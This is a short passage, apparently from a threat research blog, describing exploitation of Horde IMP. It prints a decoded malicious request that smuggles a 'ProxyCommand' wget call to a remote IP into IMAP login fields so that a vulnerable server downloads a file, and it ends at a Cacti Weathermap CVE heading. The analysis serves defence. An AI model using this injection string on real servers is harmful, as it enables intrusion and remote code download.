Tag: Horde IMP

After the vulnerable server decodes the string, it is instructed to download a malicious file. The malicious request after decoding is: oProxyCommand= wget http://185.29.8.28/down.php&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit. Again, in this case the threat actor took down the malicious file download.php before the researchers could download it to analyze. Weathermap Editor (cacti plugin) Arbitrary Code Execution (CVE-2013-3739) Another known…